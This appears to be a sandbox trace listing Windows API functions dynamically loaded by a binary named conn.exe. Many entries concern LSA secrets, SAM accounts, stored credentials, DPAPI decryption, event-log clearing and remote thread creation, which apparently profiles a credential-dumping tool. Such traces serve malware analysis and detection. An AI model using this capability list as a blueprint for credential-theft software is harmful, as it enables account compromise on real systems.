- DynamicLoader: kernel32.dll/FreeLibraryWhenCallbackReturns - DynamicLoader: kernel32.dll/GetCurrentProcessorNumber - DynamicLoader: kernel32.dll/CreateSymbolicLinkW - DynamicLoader: kernel32.dll/GetCurrentPackageId - DynamicLoader: kernel32.dll/GetTickCount64 - DynamicLoader: kernel32.dll/GetFileInformationByHandleEx - DynamicLoader: kernel32.dll/SetFileInformationByHandle - DynamicLoader: kernel32.dll/GetSystemTimePreciseAsFileTime - DynamicLoader: kernel32.dll/InitializeConditionVariable - DynamicLoader: kernel32.dll/WakeConditionVariable - DynamicLoader: kernel32.dll/WakeAllConditionVariable - DynamicLoader: kernel32.dll/SleepConditionVariableCS - DynamicLoader: kernel32.dll/InitializeSRWLock - DynamicLoader: kernel32.dll/AcquireSRWLockExclusive - DynamicLoader: kernel32.dll/TryAcquireSRWLockExclusive - DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive - DynamicLoader: kernel32.dll/SleepConditionVariableSRW - DynamicLoader: kernel32.dll/CreateThreadpoolWork - DynamicLoader: kernel32.dll/SubmitThreadpoolWork - DynamicLoader: kernel32.dll/CloseThreadpoolWork - DynamicLoader: kernel32.dll/CompareStringEx - DynamicLoader: kernel32.dll/GetLocaleInfoEx - DynamicLoader: kernel32.dll/LCMapStringEx - DynamicLoader: kernel32.dll/InitializeConditionVariable - DynamicLoader: kernel32.dll/SleepConditionVariableCS - DynamicLoader: kernel32.dll/WakeAllConditionVariable - DynamicLoader: kernel32.dll/AreFileApisANSI - DynamicLoader: kernel32.dll/GetNativeSystemInfo - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW - DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW - DynamicLoader: comctl32.dll/ - DynamicLoader: kernel32.dll/FlsGetValue - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: ADVAPI32.dll/LookupAccountSidW - DynamicLoader: sechost.dll/LookupAccountSidLocalW - DynamicLoader: NETAPI32.DLL/NetStatisticsGet - DynamicLoader: 
NETAPI32.DLL/NetApiBufferFree - DynamicLoader: ADVAPI32.dll/CryptAcquireContextW - DynamicLoader: ADVAPI32.dll/CryptGenRandom - DynamicLoader: ADVAPI32.dll/CryptReleaseContext - DynamicLoader: CRYPTSP.dll/CryptAcquireContextW - DynamicLoader: CRYPTSP.dll/CryptGenRandom - DynamicLoader: CRYPTSP.dll/CryptReleaseContext - DynamicLoader: conn.exe/_OPENSSL_isservice - DynamicLoader: USER32.dll/GetForegroundWindow - DynamicLoader: USER32.dll/GetCursorInfo - DynamicLoader: USER32.dll/GetQueueStatus - DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot - DynamicLoader: kernel32.dll/CloseToolhelp32Snapshot - DynamicLoader: kernel32.dll/Heap32First - DynamicLoader: kernel32.dll/Heap32Next - DynamicLoader: kernel32.dll/Heap32ListFirst - DynamicLoader: kernel32.dll/Heap32ListNext - DynamicLoader: kernel32.dll/Process32First - DynamicLoader: kernel32.dll/Process32Next - DynamicLoader: kernel32.dll/Thread32First - DynamicLoader: kernel32.dll/Thread32Next - DynamicLoader: kernel32.dll/Module32First - DynamicLoader: kernel32.dll/Module32Next - DynamicLoader: NETAPI32.DLL/NetStatisticsGet - DynamicLoader: NETAPI32.DLL/NetApiBufferFree


- DynamicLoader: ADVAPI32.dll/CryptAcquireContextW - DynamicLoader: ADVAPI32.dll/CryptGenRandom - DynamicLoader: ADVAPI32.dll/CryptReleaseContext - DynamicLoader: USER32.dll/GetForegroundWindow - DynamicLoader: USER32.dll/GetCursorInfo - DynamicLoader: USER32.dll/GetQueueStatus - DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot - DynamicLoader: kernel32.dll/CloseToolhelp32Snapshot - DynamicLoader: kernel32.dll/Heap32First - DynamicLoader: kernel32.dll/Heap32Next - DynamicLoader: kernel32.dll/Heap32ListFirst - DynamicLoader: kernel32.dll/Heap32ListNext - DynamicLoader: kernel32.dll/Process32First - DynamicLoader: kernel32.dll/Process32Next - DynamicLoader: kernel32.dll/Thread32First - DynamicLoader: kernel32.dll/Thread32Next - DynamicLoader: kernel32.dll/Module32First - DynamicLoader: kernel32.dll/Module32Next - DynamicLoader: api-ms-win-core-synch-l1-2-0.DLL/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: api-ms-win-core-synch-l1-2-0.DLL/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsGetValue - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: kernel32.dll/LCMapStringEx - DynamicLoader: ADVAPI32.dll/CryptReleaseContext - DynamicLoader: ADVAPI32.dll/CryptGenKey - DynamicLoader: ADVAPI32.dll/CryptGetProvParam - DynamicLoader: ADVAPI32.dll/CryptGetHashParam - DynamicLoader: ADVAPI32.dll/CryptImportKey - DynamicLoader: ADVAPI32.dll/CryptSetKeyParam - DynamicLoader: ADVAPI32.dll/CryptDestroyHash - DynamicLoader: ADVAPI32.dll/CryptSetHashParam - DynamicLoader: ADVAPI32.dll/CryptHashData - DynamicLoader: ADVAPI32.dll/CryptCreateHash - DynamicLoader: ADVAPI32.dll/CryptExportKey - DynamicLoader: ADVAPI32.dll/CryptDecrypt - DynamicLoader: ADVAPI32.dll/SystemFunction007 - DynamicLoader: ADVAPI32.dll/CryptDuplicateKey - DynamicLoader: ADVAPI32.dll/CryptEncrypt - DynamicLoader: ADVAPI32.dll/CryptAcquireContextW - DynamicLoader: 
ADVAPI32.dll/CryptGetKeyParam - DynamicLoader: ADVAPI32.dll/CryptAcquireContextA - DynamicLoader: ADVAPI32.dll/CryptDestroyKey - DynamicLoader: ADVAPI32.dll/GetLengthSid - DynamicLoader: ADVAPI32.dll/CopySid - DynamicLoader: ADVAPI32.dll/LsaClose - DynamicLoader: ADVAPI32.dll/LsaOpenPolicy - DynamicLoader: ADVAPI32.dll/LsaQueryInformationPolicy - DynamicLoader: ADVAPI32.dll/CreateWellKnownSid - DynamicLoader: ADVAPI32.dll/CreateProcessAsUserW - DynamicLoader: ADVAPI32.dll/CreateProcessWithLogonW - DynamicLoader: ADVAPI32.dll/RegQueryValueExW - DynamicLoader: ADVAPI32.dll/RegEnumValueW - DynamicLoader: ADVAPI32.dll/RegOpenKeyExW - DynamicLoader: ADVAPI32.dll/RegSetValueExW - DynamicLoader: ADVAPI32.dll/RegEnumKeyExW - DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW - DynamicLoader: ADVAPI32.dll/RegCloseKey - DynamicLoader: ADVAPI32.dll/SystemFunction032 - DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW - DynamicLoader: ADVAPI32.dll/QueryServiceObjectSecurity


- DynamicLoader: ADVAPI32.dll/QueryServiceStatusEx - DynamicLoader: ADVAPI32.dll/BuildSecurityDescriptorW - DynamicLoader: ADVAPI32.dll/OpenServiceW - DynamicLoader: ADVAPI32.dll/StartServiceW - DynamicLoader: ADVAPI32.dll/FreeSid - DynamicLoader: ADVAPI32.dll/ControlService - DynamicLoader: ADVAPI32.dll/SetServiceObjectSecurity - DynamicLoader: ADVAPI32.dll/DeleteService - DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid - DynamicLoader: ADVAPI32.dll/OpenSCManagerW - DynamicLoader: ADVAPI32.dll/CloseServiceHandle - DynamicLoader: ADVAPI32.dll/CreateServiceW - DynamicLoader: ADVAPI32.dll/IsTextUnicode - DynamicLoader: ADVAPI32.dll/GetTokenInformation - DynamicLoader: ADVAPI32.dll/LookupAccountNameW - DynamicLoader: ADVAPI32.dll/LookupAccountSidW - DynamicLoader: ADVAPI32.dll/DuplicateTokenEx - DynamicLoader: ADVAPI32.dll/CheckTokenMembership - DynamicLoader: ADVAPI32.dll/OpenProcessToken - DynamicLoader: ADVAPI32.dll/CryptEnumProvidersW - DynamicLoader: ADVAPI32.dll/ConvertStringSidToSidW - DynamicLoader: ADVAPI32.dll/LsaFreeMemory - DynamicLoader: ADVAPI32.dll/SystemFunction006 - DynamicLoader: ADVAPI32.dll/CryptEnumProviderTypesW - DynamicLoader: ADVAPI32.dll/CryptSetProvParam - DynamicLoader: ADVAPI32.dll/CryptGetUserKey - DynamicLoader: ADVAPI32.dll/OpenEventLogW - DynamicLoader: ADVAPI32.dll/ClearEventLogW - DynamicLoader: ADVAPI32.dll/GetNumberOfEventLogRecords - DynamicLoader: ADVAPI32.dll/CryptSignHashW - DynamicLoader: ADVAPI32.dll/LsaRetrievePrivateData - DynamicLoader: ADVAPI32.dll/LsaOpenSecret - DynamicLoader: ADVAPI32.dll/LsaQueryTrustedDomainInfoByName - DynamicLoader: ADVAPI32.dll/CryptDeriveKey - DynamicLoader: ADVAPI32.dll/LsaQuerySecret - DynamicLoader: ADVAPI32.dll/SystemFunction001 - DynamicLoader: ADVAPI32.dll/SystemFunction005 - DynamicLoader: ADVAPI32.dll/SystemFunction013 - DynamicLoader: ADVAPI32.dll/LsaEnumerateTrustedDomainsEx - DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW - DynamicLoader: 
ADVAPI32.dll/StartServiceCtrlDispatcherW - DynamicLoader: ADVAPI32.dll/RegisterServiceCtrlHandlerW - DynamicLoader: ADVAPI32.dll/SetServiceStatus - DynamicLoader: ADVAPI32.dll/IsValidSid - DynamicLoader: ADVAPI32.dll/OpenThreadToken - DynamicLoader: ADVAPI32.dll/SetThreadToken - DynamicLoader: ADVAPI32.dll/LookupPrivilegeNameW - DynamicLoader: ADVAPI32.dll/CredFree - DynamicLoader: ADVAPI32.dll/CredEnumerateW - DynamicLoader: ADVAPI32.dll/SystemFunction025 - DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW - DynamicLoader: ADVAPI32.dll/GetSidSubAuthority - DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount - DynamicLoader: ADVAPI32.dll/SystemFunction024 - DynamicLoader: Cabinet.dll/ - DynamicLoader: Cabinet.dll/ - DynamicLoader: Cabinet.dll/ - DynamicLoader: Cabinet.dll/ - DynamicLoader: CRYPT32.dll/CertAddCertificateContextToStore - DynamicLoader: CRYPT32.dll/CertGetCertificateContextProperty - DynamicLoader: CRYPT32.dll/CertGetNameStringW - DynamicLoader: CRYPT32.dll/CertFindCertificateInStore - DynamicLoader: CRYPT32.dll/CryptEncodeObject


- DynamicLoader: CRYPT32.dll/CertAddEncodedCertificateToStore - DynamicLoader: CRYPT32.dll/CertFreeCertificateContext - DynamicLoader: CRYPT32.dll/CertCloseStore - DynamicLoader: CRYPT32.dll/PFXExportCertStoreEx - DynamicLoader: CRYPT32.dll/CertSetCertificateContextProperty - DynamicLoader: CRYPT32.dll/CertOpenStore - DynamicLoader: CRYPT32.dll/CryptUnprotectData - DynamicLoader: CRYPT32.dll/CryptBinaryToStringW - DynamicLoader: CRYPT32.dll/CryptStringToBinaryW - DynamicLoader: CRYPT32.dll/CryptProtectData - DynamicLoader: CRYPT32.dll/CryptAcquireCertificatePrivateKey - DynamicLoader: CRYPT32.dll/CryptExportPublicKeyInfo - DynamicLoader: CRYPT32.dll/CertEnumSystemStore - DynamicLoader: CRYPT32.dll/CertNameToStrW - DynamicLoader: CRYPT32.dll/CryptSignAndEncodeCertificate - DynamicLoader: CRYPT32.dll/CertEnumCertificatesInStore - DynamicLoader: cryptdll.dll/CDLocateCSystem - DynamicLoader: cryptdll.dll/MD5Update - DynamicLoader: cryptdll.dll/MD5Init - DynamicLoader: cryptdll.dll/CDLocateCheckSum - DynamicLoader: cryptdll.dll/CDGenerateRandomBits - DynamicLoader: cryptdll.dll/MD5Final - DynamicLoader: FLTLIB.DLL/FilterFindNext - DynamicLoader: FLTLIB.DLL/FilterFindFirst - DynamicLoader: NETAPI32.dll/NetRemoteTOD - DynamicLoader: NETAPI32.dll/DsGetDcNameW - DynamicLoader: NETAPI32.dll/NetApiBufferFree - DynamicLoader: NETAPI32.dll/NetWkstaUserEnum - DynamicLoader: NETAPI32.dll/NetShareEnum - DynamicLoader: NETAPI32.dll/NetStatisticsGet - DynamicLoader: NETAPI32.dll/NetSessionEnum - DynamicLoader: NETAPI32.dll/NetServerGetInfo - DynamicLoader: ole32.dll/CoInitializeEx - DynamicLoader: ole32.dll/CoUninitialize - DynamicLoader: ole32.dll/CoCreateInstance - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: RPCRT4.dll/RpcEpUnregister - DynamicLoader: RPCRT4.dll/RpcBindingInqAuthClientW - DynamicLoader: RPCRT4.dll/RpcBindingSetOption - DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW - DynamicLoader: 
RPCRT4.dll/RpcStringBindingComposeW - DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW - DynamicLoader: RPCRT4.dll/RpcStringFreeW - DynamicLoader: RPCRT4.dll/MesHandleFree - DynamicLoader: RPCRT4.dll/RpcImpersonateClient - DynamicLoader: RPCRT4.dll/RpcRevertToSelf - DynamicLoader: RPCRT4.dll/MesEncodeIncrementalHandleCreate - DynamicLoader: RPCRT4.dll/MesDecodeIncrementalHandleCreate - DynamicLoader: RPCRT4.dll/RpcBindingFree - DynamicLoader: RPCRT4.dll/MesIncrementalHandleReset - DynamicLoader: RPCRT4.dll/NdrMesTypeEncode2 - DynamicLoader: RPCRT4.dll/NdrMesTypeDecode2 - DynamicLoader: RPCRT4.dll/NdrMesTypeFree2 - DynamicLoader: RPCRT4.dll/NdrMesTypeAlignSize2 - DynamicLoader: RPCRT4.dll/RpcBindingVectorFree - DynamicLoader: RPCRT4.dll/RpcServerUseProtseqEpW - DynamicLoader: RPCRT4.dll/RpcServerUnregisterIfEx - DynamicLoader: RPCRT4.dll/RpcBindingToStringBindingW - DynamicLoader: RPCRT4.dll/UuidToStringW - DynamicLoader: RPCRT4.dll/RpcServerRegisterIf2 - DynamicLoader: RPCRT4.dll/RpcMgmtWaitServerListen


- DynamicLoader: RPCRT4.dll/RpcServerListen - DynamicLoader: RPCRT4.dll/RpcServerRegisterAuthInfoW - DynamicLoader: RPCRT4.dll/I_RpcGetCurrentCallHandle - DynamicLoader: RPCRT4.dll/RpcEpRegisterW - DynamicLoader: RPCRT4.dll/RpcServerInqBindings - DynamicLoader: RPCRT4.dll/RpcMgmtStopServerListening - DynamicLoader: RPCRT4.dll/I_RpcBindingInqSecurityContext - DynamicLoader: RPCRT4.dll/NdrClientCall2 - DynamicLoader: RPCRT4.dll/NdrServerCall2 - DynamicLoader: RPCRT4.dll/UuidCreate - DynamicLoader: RPCRT4.dll/RpcMgmtEpEltInqBegin - DynamicLoader: RPCRT4.dll/RpcMgmtEpEltInqDone - DynamicLoader: RPCRT4.dll/RpcMgmtEpEltInqNextW - DynamicLoader: RPCRT4.dll/RpcEpResolveBinding - DynamicLoader: SHLWAPI.dll/PathIsDirectoryW - DynamicLoader: SHLWAPI.dll/PathFindFileNameW - DynamicLoader: SHLWAPI.dll/PathIsRelativeW - DynamicLoader: SHLWAPI.dll/PathCanonicalizeW - DynamicLoader: SHLWAPI.dll/PathCombineW - DynamicLoader: SAMLIB.dll/SamLookupIdsInDomain - DynamicLoader: SAMLIB.dll/SamGetMembersInGroup - DynamicLoader: SAMLIB.dll/SamEnumerateGroupsInDomain - DynamicLoader: SAMLIB.dll/SamGetAliasMembership - DynamicLoader: SAMLIB.dll/SamOpenAlias - DynamicLoader: SAMLIB.dll/SamRidToSid - DynamicLoader: SAMLIB.dll/SamEnumerateUsersInDomain - DynamicLoader: SAMLIB.dll/SamLookupNamesInDomain - DynamicLoader: SAMLIB.dll/SamOpenDomain - DynamicLoader: SAMLIB.dll/SamEnumerateDomainsInSamServer - DynamicLoader: SAMLIB.dll/SamOpenUser - DynamicLoader: SAMLIB.dll/SamiChangePasswordUser - DynamicLoader: SAMLIB.dll/SamGetGroupsForUser - DynamicLoader: SAMLIB.dll/SamConnect - DynamicLoader: SAMLIB.dll/SamCloseHandle - DynamicLoader: SAMLIB.dll/SamLookupDomainInSamServer - DynamicLoader: SAMLIB.dll/SamFreeMemory - DynamicLoader: SAMLIB.dll/SamQueryInformationUser - DynamicLoader: SAMLIB.dll/SamSetInformationUser - DynamicLoader: SAMLIB.dll/SamOpenGroup - DynamicLoader: SAMLIB.dll/SamEnumerateAliasesInDomain - DynamicLoader: SAMLIB.dll/SamGetMembersInAlias - DynamicLoader: 
Secur32.dll/LsaConnectUntrusted - DynamicLoader: Secur32.dll/QueryContextAttributesW - DynamicLoader: Secur32.dll/FreeContextBuffer - DynamicLoader: Secur32.dll/LsaCallAuthenticationPackage - DynamicLoader: Secur32.dll/LsaDeregisterLogonProcess - DynamicLoader: Secur32.dll/LsaLookupAuthenticationPackage - DynamicLoader: Secur32.dll/LsaFreeReturnBuffer - DynamicLoader: SHELL32.dll/CommandLineToArgvW - DynamicLoader: USER32.dll/UnregisterClassW - DynamicLoader: USER32.dll/RegisterClassExW - DynamicLoader: USER32.dll/IsCharAlphaNumericW - DynamicLoader: USER32.dll/GetKeyboardLayout - DynamicLoader: USER32.dll/GetClipboardSequenceNumber - DynamicLoader: USER32.dll/GetClipboardData - DynamicLoader: USER32.dll/TranslateMessage - DynamicLoader: USER32.dll/OpenClipboard - DynamicLoader: USER32.dll/DispatchMessageW - DynamicLoader: USER32.dll/ChangeClipboardChain - DynamicLoader: USER32.dll/CloseClipboard - DynamicLoader: USER32.dll/DestroyWindow - DynamicLoader: USER32.dll/SendMessageW - DynamicLoader: USER32.dll/CreateWindowExW


- DynamicLoader: USER32.dll/SetClipboardViewer - DynamicLoader: USER32.dll/PostMessageW - DynamicLoader: USER32.dll/DefWindowProcW - DynamicLoader: USER32.dll/GetMessageW - DynamicLoader: USER32.dll/EnumClipboardFormats - DynamicLoader: USERENV.dll/CreateEnvironmentBlock - DynamicLoader: USERENV.dll/DestroyEnvironmentBlock - DynamicLoader: VERSION.dll/VerQueryValueW - DynamicLoader: VERSION.dll/GetFileVersionInfoW - DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW - DynamicLoader: HID.DLL/HidD_GetHidGuid - DynamicLoader: HID.DLL/HidD_FreePreparsedData - DynamicLoader: HID.DLL/HidD_GetPreparsedData - DynamicLoader: HID.DLL/HidP_GetCaps - DynamicLoader: HID.DLL/HidD_GetAttributes - DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsW - DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList - DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInterfaces - DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceInterfaceDetailW - DynamicLoader: WinSCard.dll/SCardControl - DynamicLoader: WinSCard.dll/SCardConnectW - DynamicLoader: WinSCard.dll/SCardFreeMemory - DynamicLoader: WinSCard.dll/SCardGetAttrib - DynamicLoader: WinSCard.dll/SCardDisconnect - DynamicLoader: WinSCard.dll/SCardEstablishContext - DynamicLoader: WinSCard.dll/SCardReleaseContext - DynamicLoader: WinSCard.dll/SCardListCardsW - DynamicLoader: WinSCard.dll/SCardGetCardTypeProviderNameW - DynamicLoader: WinSCard.dll/SCardListReadersW - DynamicLoader: WINSTA.dll/WinStationConnectW - DynamicLoader: WINSTA.dll/WinStationFreeMemory - DynamicLoader: WINSTA.dll/WinStationCloseServer - DynamicLoader: WINSTA.dll/WinStationQueryInformationW - DynamicLoader: WINSTA.dll/WinStationOpenServerW - DynamicLoader: WINSTA.dll/WinStationEnumerateW - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: 
WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/


- DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: WLDAP32.dll/ - DynamicLoader: ADVAPI32.dll/A_SHAUpdate - DynamicLoader: ADVAPI32.dll/A_SHAFinal - DynamicLoader: ADVAPI32.dll/A_SHAInit - DynamicLoader: MSASN1.dll/ASN1_CloseEncoder - DynamicLoader: MSASN1.dll/ASN1BERDotVal2Eoid - DynamicLoader: MSASN1.dll/ASN1_FreeEncoded - DynamicLoader: MSASN1.dll/ASN1_CreateEncoder - DynamicLoader: MSASN1.dll/ASN1_CloseModule - DynamicLoader: MSASN1.dll/ASN1_CreateDecoder - DynamicLoader: MSASN1.dll/ASN1_CloseDecoder - DynamicLoader: MSASN1.dll/ASN1_CreateModule - DynamicLoader: ntdll.dll/RtlDowncaseUnicodeString - DynamicLoader: ntdll.dll/RtlFreeUnicodeString - DynamicLoader: ntdll.dll/RtlUnicodeStringToAnsiString - DynamicLoader: ntdll.dll/RtlCompressBuffer - DynamicLoader: ntdll.dll/NtQuerySystemInformation - DynamicLoader: ntdll.dll/NtQuerySystemEnvironmentValueEx - DynamicLoader: ntdll.dll/NtQueryInformationProcess - DynamicLoader: ntdll.dll/RtlGetCurrentPeb - DynamicLoader: ntdll.dll/RtlCreateUserThread - DynamicLoader: ntdll.dll/RtlGUIDFromString - DynamicLoader: ntdll.dll/RtlStringFromGUID - DynamicLoader: ntdll.dll/RtlEqualUnicodeString - DynamicLoader: ntdll.dll/RtlGetNtVersionNumbers - DynamicLoader: ntdll.dll/RtlEqualString - DynamicLoader: ntdll.dll/RtlAppendUnicodeStringToString - DynamicLoader: ntdll.dll/NtEnumerateSystemEnvironmentValuesEx - DynamicLoader: ntdll.dll/RtlAnsiStringToUnicodeString - DynamicLoader: ntdll.dll/RtlFreeOemString - DynamicLoader: ntdll.dll/RtlUpcaseUnicodeStringToOemString - DynamicLoader: ntdll.dll/NtResumeProcess - DynamicLoader: ntdll.dll/RtlAdjustPrivilege - DynamicLoader: ntdll.dll/NtTerminateProcess - DynamicLoader: ntdll.dll/RtlIpv4AddressToStringW - DynamicLoader: ntdll.dll/RtlIpv6AddressToStringW - DynamicLoader: ntdll.dll/RtlInitUnicodeString - DynamicLoader: ntdll.dll/NtQueryObject - DynamicLoader: 
ntdll.dll/NtCompareTokens - DynamicLoader: ntdll.dll/RtlGetCompressionWorkSpaceSize - DynamicLoader: ntdll.dll/NtSuspendProcess - DynamicLoader: ntdll.dll/NtSetSystemEnvironmentValueEx - DynamicLoader: ntdll.dll/RtlFreeAnsiString - DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString - DynamicLoader: NETAPI32.dll/I_NetServerAuthenticate2 - DynamicLoader: NETAPI32.dll/I_NetServerReqChallenge - DynamicLoader: NETAPI32.dll/I_NetServerTrustPasswordsGet - DynamicLoader: kernel32.dll/GetCPInfo - DynamicLoader: kernel32.dll/GetEnvironmentStringsW - DynamicLoader: kernel32.dll/IsValidCodePage - DynamicLoader: kernel32.dll/FindFirstFileExW - DynamicLoader: kernel32.dll/GetStringTypeW - DynamicLoader: kernel32.dll/SetStdHandle - DynamicLoader: kernel32.dll/GetConsoleMode - DynamicLoader: kernel32.dll/GetConsoleCP - DynamicLoader: kernel32.dll/LCMapStringW - DynamicLoader: kernel32.dll/CompareStringW - DynamicLoader: kernel32.dll/GetFileType


- DynamicLoader: kernel32.dll/GetACP - DynamicLoader: kernel32.dll/GetModuleHandleExW - DynamicLoader: kernel32.dll/TerminateProcess - DynamicLoader: kernel32.dll/GetModuleFileNameW - DynamicLoader: kernel32.dll/GetCommandLineW - DynamicLoader: kernel32.dll/GetCommandLineA - DynamicLoader: kernel32.dll/LoadLibraryExW - DynamicLoader: kernel32.dll/TlsFree - DynamicLoader: kernel32.dll/TlsSetValue - DynamicLoader: kernel32.dll/TlsGetValue - DynamicLoader: kernel32.dll/TlsAlloc - DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount - DynamicLoader: kernel32.dll/RtlUnwindEx - DynamicLoader: kernel32.dll/IsProcessorFeaturePresent - DynamicLoader: kernel32.dll/GetStartupInfoW - DynamicLoader: kernel32.dll/SetUnhandledExceptionFilter - DynamicLoader: kernel32.dll/UnhandledExceptionFilter - DynamicLoader: kernel32.dll/IsDebuggerPresent - DynamicLoader: kernel32.dll/RtlVirtualUnwind - DynamicLoader: kernel32.dll/RtlLookupFunctionEntry - DynamicLoader: kernel32.dll/RtlCaptureContext - DynamicLoader: kernel32.dll/InitializeSListHead - DynamicLoader: kernel32.dll/GetCurrentThreadId - DynamicLoader: kernel32.dll/LoadLibraryExA - DynamicLoader: kernel32.dll/GetProcessId - DynamicLoader: kernel32.dll/GetComputerNameW - DynamicLoader: kernel32.dll/ProcessIdToSessionId - DynamicLoader: kernel32.dll/GetCurrentThread - DynamicLoader: kernel32.dll/SetConsoleCursorPosition - DynamicLoader: kernel32.dll/SetCurrentDirectoryW - DynamicLoader: kernel32.dll/FillConsoleOutputCharacterW - DynamicLoader: kernel32.dll/GetTimeZoneInformation - DynamicLoader: kernel32.dll/GetSystemDirectoryW - DynamicLoader: kernel32.dll/GetStdHandle - DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo - DynamicLoader: kernel32.dll/SetEvent - DynamicLoader: kernel32.dll/CreateEventW - DynamicLoader: kernel32.dll/CreatePipe - DynamicLoader: kernel32.dll/SetHandleInformation - DynamicLoader: kernel32.dll/GetModuleHandleW - DynamicLoader: kernel32.dll/GlobalSize - DynamicLoader: 
kernel32.dll/FreeLibrary - DynamicLoader: kernel32.dll/GetProcAddress - DynamicLoader: kernel32.dll/LoadLibraryW - DynamicLoader: kernel32.dll/lstrlenA - DynamicLoader: kernel32.dll/ExitProcess - DynamicLoader: kernel32.dll/RaiseException - DynamicLoader: kernel32.dll/SetConsoleCtrlHandler - DynamicLoader: kernel32.dll/GetTickCount - DynamicLoader: kernel32.dll/QueryPerformanceCounter - DynamicLoader: kernel32.dll/FormatMessageA - DynamicLoader: kernel32.dll/GetSystemTime - DynamicLoader: kernel32.dll/GetProcessHeap - DynamicLoader: kernel32.dll/GetCurrentProcessId - DynamicLoader: kernel32.dll/DeleteCriticalSection - DynamicLoader: kernel32.dll/GetFileSize - DynamicLoader: kernel32.dll/LockFileEx - DynamicLoader: kernel32.dll/CreateFileMappingA - DynamicLoader: kernel32.dll/UnlockFile - DynamicLoader: kernel32.dll/HeapDestroy - DynamicLoader: kernel32.dll/HeapCompact - DynamicLoader: kernel32.dll/HeapAlloc - DynamicLoader: kernel32.dll/GetSystemInfo


- DynamicLoader: kernel32.dll/HeapReAlloc - DynamicLoader: kernel32.dll/DeleteFileW - DynamicLoader: kernel32.dll/GetVersionExA - DynamicLoader: kernel32.dll/WaitForSingleObjectEx - DynamicLoader: kernel32.dll/FlushViewOfFile - DynamicLoader: kernel32.dll/OutputDebugStringW - DynamicLoader: kernel32.dll/GetFileAttributesExW - DynamicLoader: kernel32.dll/GetFileAttributesA - DynamicLoader: kernel32.dll/GetDiskFreeSpaceA - DynamicLoader: kernel32.dll/FormatMessageW - DynamicLoader: kernel32.dll/MultiByteToWideChar - DynamicLoader: kernel32.dll/HeapSize - DynamicLoader: kernel32.dll/HeapValidate - DynamicLoader: kernel32.dll/GetVersionExW - DynamicLoader: kernel32.dll/CreateMutexW - DynamicLoader: kernel32.dll/GetTempPathW - DynamicLoader: kernel32.dll/UnlockFileEx - DynamicLoader: kernel32.dll/SetEndOfFile - DynamicLoader: kernel32.dll/GetFullPathNameA - DynamicLoader: kernel32.dll/InitializeCriticalSection - DynamicLoader: kernel32.dll/LeaveCriticalSection - DynamicLoader: kernel32.dll/LockFile - DynamicLoader: kernel32.dll/OutputDebugStringA - DynamicLoader: kernel32.dll/GetDiskFreeSpaceW - DynamicLoader: kernel32.dll/GetFullPathNameW - DynamicLoader: kernel32.dll/EnterCriticalSection - DynamicLoader: kernel32.dll/HeapFree - DynamicLoader: kernel32.dll/HeapCreate - DynamicLoader: kernel32.dll/TryEnterCriticalSection - DynamicLoader: kernel32.dll/AreFileApisANSI - DynamicLoader: kernel32.dll/GetDateFormatW - DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime - DynamicLoader: kernel32.dll/WideCharToMultiByte - DynamicLoader: kernel32.dll/SystemTimeToFileTime - DynamicLoader: kernel32.dll/GetTimeFormatW - DynamicLoader: kernel32.dll/lstrlenW - DynamicLoader: kernel32.dll/ClearCommError - DynamicLoader: kernel32.dll/PurgeComm - DynamicLoader: kernel32.dll/CreateRemoteThread - DynamicLoader: kernel32.dll/WaitForSingleObject - DynamicLoader: kernel32.dll/SetLastError - DynamicLoader: kernel32.dll/FreeEnvironmentStringsW - DynamicLoader: 
